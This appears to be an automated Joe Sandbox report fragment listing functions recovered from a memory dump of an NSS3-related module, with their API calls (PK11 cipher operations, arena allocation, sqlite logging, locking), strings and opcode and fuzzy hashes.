memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6CD2EF01

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 0b1bb6e3d9c2dbdd1224c3bd6ad11e7fad85c2b0e967b5db5d16275627e91971
Instruction ID: b33f2573e8c72da33bcbf5a444b7187a8573c85fa8556d023abcb43703c6673c
Opcode Fuzzy Hash: 0b1bb6e3d9c2dbdd1224c3bd6ad11e7fad85c2b0e967b5db5d16275627e91971
Instruction Fuzzy Hash: A021B471A00214ABDB109F38DC8069A77A8EF4535DF148169EE199BA61D335E814C7F2

Function 6CCDEE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CCDEE49

Part of subcall function 6CCFFAB0: free.MOZGLUE(?,-00000001,?,?,6CC9F673,00000000,00000000), ref: 6CCFFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CCDEE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6CCDEE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6CCDEE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CCDEEB3

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: db7a8f13f4515e4427601c50adb94ad7f99af4d07ded21018e9c92a721f1887b
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 4921C3B6A002116BEB118B18DC81EABB7A8EF45718F090168FE149B741F671EC15C7E1

Function 6CC8AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CC8AFDA

Strings

unable to delete/modify collation sequence due to active statements, xrefs: 6CC8AF5C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC8AFC4
misuse, xrefs: 6CC8AFCE
%s at line %d of [%.10s], xrefs: 6CC8AFD3

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 1835afbd062bf8ce0d4acdba4f0a3214194d846b043bbf6e8a3b6e8191e9db43
Instruction ID: 2d72fad30c00efa82ea7cd295f00d9cd695dfa99023c5262513e753e2f11d1f8
Opcode Fuzzy Hash: 1835afbd062bf8ce0d4acdba4f0a3214194d846b043bbf6e8a3b6e8191e9db43
Instruction Fuzzy Hash: 5E91C3B5B062158FDB04CF59C850BABBBF1BF85318F19459CE865AB791E734AC02CB60

Function 6CC90DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CC90BDE), ref: 6CC90DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6CC90BDE), ref: 6CC90DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CC90BDE), ref: 6CC90DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CC90BDE), ref: 6CC90E32

Strings

%s incr => %d (find lib), xrefs: 6CC90E2D

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 870df7a93510c66b03e6e26e52067626e4ea7ed06b440c99fccf363bf78ee5a1
Instruction ID: ebad4ec495b3d5a11ab4143178797f174b729f30032ef6da599798f56b99425f
Opcode Fuzzy Hash: 870df7a93510c66b03e6e26e52067626e4ea7ed06b440c99fccf363bf78ee5a1
Instruction Fuzzy Hash: 8601D4B27003149FE7209F259C45E1773FCEB49A09B05446DE949E3B52F762FD1886E1

Function 6CC9EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CC9EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6CC9EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CC9EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC9EEEB
free.MOZGLUE(?), ref: 6CC9EEF6

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 64ef7d0274f0203650e4167f36ee2b5b6382b134a63979de072de52ff8ba3fe7
Instruction ID: 33962e92bef4ab9a1e08a484f56a9198a6f4467795e0ec80b7e65be17efcf684
Opcode Fuzzy Hash: 64ef7d0274f0203650e4167f36ee2b5b6382b134a63979de072de52ff8ba3fe7
Instruction Fuzzy Hash: B93108B1A00600DBEB209F2DDC44B667BF4FB56355F14052DE95A87A50FB32E864CBE1

Function 6CCAAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6CCA3FFF,00000000,?,?,?,?,?,6CCA1A1C,00000000,00000000), ref: 6CCAADA7

Part of subcall function 6CD014C0: TlsGetValue.KERNEL32 ref: 6CD014E0
Part of subcall function 6CD014C0: EnterCriticalSection.KERNEL32 ref: 6CD014F5
Part of subcall function 6CD014C0: PR_Unlock.NSS3 ref: 6CD0150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CCA3FFF,00000000,?,?,?,?,?,6CCA1A1C,00000000,00000000), ref: 6CCAADB4

Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD010F3
Part of subcall function 6CD010C0: EnterCriticalSection.KERNEL32(?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0110C
Part of subcall function 6CD010C0: PL_ArenaAllocate.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01141
Part of subcall function 6CD010C0: PR_Unlock.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01182
Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6CCA3FFF,?,?,?,?,6CCA3FFF,00000000,?,?,?,?,?,6CCA1A1C,00000000), ref: 6CCAADD5

Part of subcall function 6CCFFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CCF8D2D,?,00000000,?), ref: 6CCFFB85
Part of subcall function 6CCFFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CCFFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CDC94B0,?,?,?,?,?,?,?,?,6CCA3FFF,00000000,?), ref: 6CCAADEC

Part of subcall function 6CCFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CDD18D0,?), ref: 6CCFB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CCA3FFF), ref: 6CCAAE3C

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: e758e5764b5eddce5a98086dfde114640308472424d31392ff3d704ae11c9a88
Instruction ID: 193f01b7d00aaf690b19612c6aea8af20e7726713fc287454f5a148a6b0742f2
Opcode Fuzzy Hash: e758e5764b5eddce5a98086dfde114640308472424d31392ff3d704ae11c9a88
Instruction Fuzzy Hash: A2112971E002056BF7109BA99C44BBF73B8DF9534DF044128FC5596B41F720E55A86A2

Function 6CCC8E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6CCE2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CCB4F1C), ref: 6CCC8EA2

Part of subcall function 6CCEF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CCEF854
Part of subcall function 6CCEF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CCEF868
Part of subcall function 6CCEF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CCEF882
Part of subcall function 6CCEF820: free.MOZGLUE(04C483FF,?,?), ref: 6CCEF889
Part of subcall function 6CCEF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CCEF8A4
Part of subcall function 6CCEF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CCEF8AB
Part of subcall function 6CCEF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CCEF8C9
Part of subcall function 6CCEF820: free.MOZGLUE(280F10EC,?,?), ref: 6CCEF8D0

PK11_IsLoggedIn.NSS3(?,?,?,6CCE2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CCB4F1C), ref: 6CCC8EC3
TlsGetValue.KERNEL32(?,?,?,6CCE2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CCB4F1C), ref: 6CCC8EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6CCE2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CCC8EF1
PR_Unlock.NSS3 ref: 6CCC8F20

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID:
API String ID: 1978757487-0
Opcode ID: bdc67ff3fcf7edd59769f011201e87e002ff9ea220be5a2ef4b81a16e951ad8a
Instruction ID: 9e453ea14e9594c5247d97eb0ddca82a6a43b3646c1ea3bdeea608484476f94f
Opcode Fuzzy Hash: bdc67ff3fcf7edd59769f011201e87e002ff9ea220be5a2ef4b81a16e951ad8a
Instruction Fuzzy Hash: 9921A174A097059FDB00AF29D4845AABBF4FF48318F01456EED989BB41E730E854CBD6

Function 6CCB8FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON

Download Yara Rule

APIs

PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6CCC0710), ref: 6CCB8FF1
PR_CallOnce.NSS3(6CE02158,6CCB9150,00000000,?,?,?,6CCB9138,?,6CCC0710), ref: 6CCB9029
calloc.MOZGLUE(00000001,00000000,?,?,6CCC0710), ref: 6CCB904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6CCC0710), ref: 6CCB9066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6CCC0710), ref: 6CCB9078

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: bbe78d39c7bd9cefcbb4da48b588b911063b35764bfd46538e855885d54f2aaf
Instruction ID: 5f27a955fae7ec645536f6378a19d58e800707157c37c3cc87529c70fef4abf9
Opcode Fuzzy Hash: bbe78d39c7bd9cefcbb4da48b588b911063b35764bfd46538e855885d54f2aaf
Instruction Fuzzy Hash: 4111252170011157E7201BE9BC44A6636BCEBA67ADF100025FC44E2F40F723CC5683E1

Function 6CCCCD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6CCE1E10: TlsGetValue.KERNEL32 ref: 6CCE1E36
Part of subcall function 6CCE1E10: EnterCriticalSection.KERNEL32(?,?,?,6CCBB1EE,2404110F,?,?), ref: 6CCE1E4B
Part of subcall function 6CCE1E10: PR_Unlock.NSS3 ref: 6CCE1E76

free.MOZGLUE(?,6CCCD079,00000000,00000001), ref: 6CCCCDA5
PK11_FreeSymKey.NSS3(?,6CCCD079,00000000,00000001), ref: 6CCCCDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CCCD079,00000000,00000001), ref: 6CCCCDCF
DeleteCriticalSection.KERNEL32(?,6CCCD079,00000000,00000001), ref: 6CCCCDE2
free.MOZGLUE(?), ref: 6CCCCDE9

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 2f18825f613f72dedab5362aa1f5e65d7a59ce1d5a2be2dca3ee4a51eace3360
Instruction ID: d2a1e847afc3937dfbfb6615b4fb1e8bbf34c0a687439bd005f3402a746d547a
Opcode Fuzzy Hash: 2f18825f613f72dedab5362aa1f5e65d7a59ce1d5a2be2dca3ee4a51eace3360
Instruction Fuzzy Hash: B511ACB2B01116ABEB00AB65EC84996B77CFF45368B104161EA1987E01F732F474C7E2

Function 6CD32CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CD35B40: PR_GetIdentitiesLayer.NSS3 ref: 6CD35B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CD32CEC

Part of subcall function 6CD4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CD4C2BF

PR_EnterMonitor.NSS3(?), ref: 6CD32D02
PR_EnterMonitor.NSS3(?), ref: 6CD32D1F
PR_ExitMonitor.NSS3(?), ref: 6CD32D42
PR_ExitMonitor.NSS3(?), ref: 6CD32D5B

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: d309233609ceedafc745193c74f10a9f105a27700e9af171d365032d57e49ded
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 74018EF1E00210ABE6219F26FC40A87B7A1EB56318F005525E89D86B31E632F819C6E2

Function 6CD32D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CD35B40: PR_GetIdentitiesLayer.NSS3 ref: 6CD35B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CD32D9C

Part of subcall function 6CD4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CD4C2BF

PR_EnterMonitor.NSS3(?), ref: 6CD32DB2
PR_EnterMonitor.NSS3(?), ref: 6CD32DCF
PR_ExitMonitor.NSS3(?), ref: 6CD32DF2
PR_ExitMonitor.NSS3(?), ref: 6CD32E0B

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: c15cf4e9d0a050cee4211a899783ed6ef49d22d810a7629d2836016af0da713a
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 6D0182B1900210ABE6209B26FC41BC7B7A1EB52318F005435E89D96B31E632F415C6E2

Function 6CCCAE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6CCB3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CCCAE42), ref: 6CCB30AA
Part of subcall function 6CCB3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CCB30C7
Part of subcall function 6CCB3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CCB30E5
Part of subcall function 6CCB3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CCB3116
Part of subcall function 6CCB3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CCB312B
Part of subcall function 6CCB3090: PK11_DestroyObject.NSS3(?,?), ref: 6CCB3154
Part of subcall function 6CCB3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCB317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CCA99FF,?,?,?,?,?,?,?,?,?,6CCA2D6B,?), ref: 6CCCAE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CCA99FF,?,?,?,?,?,?,?,?,?,6CCA2D6B,?), ref: 6CCCAE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CCA2D6B,?,?,00000000), ref: 6CCCAE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CCA2D6B,?,?,00000000), ref: 6CCCAE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CCA2D6B,?,?), ref: 6CCCAEA3

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 3c5ee16ba70ca82181d8841eef8dcf5eadf014a9330f06906d58acaa70ee53d4
Instruction ID: 7b408d02ee3c14d81abf0c7c4dbc8824d706556456d2df0d8a07fd822908444a
Opcode Fuzzy Hash: 3c5ee16ba70ca82181d8841eef8dcf5eadf014a9330f06906d58acaa70ee53d4
Instruction Fuzzy Hash: C0012872B0001057E701927DAC99BEF31988FC765CF080439E909D7B41F621CD6583E3

Function 6CDBADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6CDBA6D8), ref: 6CDBAE0D
free.MOZGLUE(?), ref: 6CDBAE14
DeleteCriticalSection.KERNEL32(6CDBA6D8), ref: 6CDBAE36
free.MOZGLUE(?), ref: 6CDBAE3D
free.MOZGLUE(00000000,00000000,?,?,6CDBA6D8), ref: 6CDBAE47

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: e435a07e1ab562da105270ea77a23b59281fbe3d8896d74d6dc7e401d4539fa1
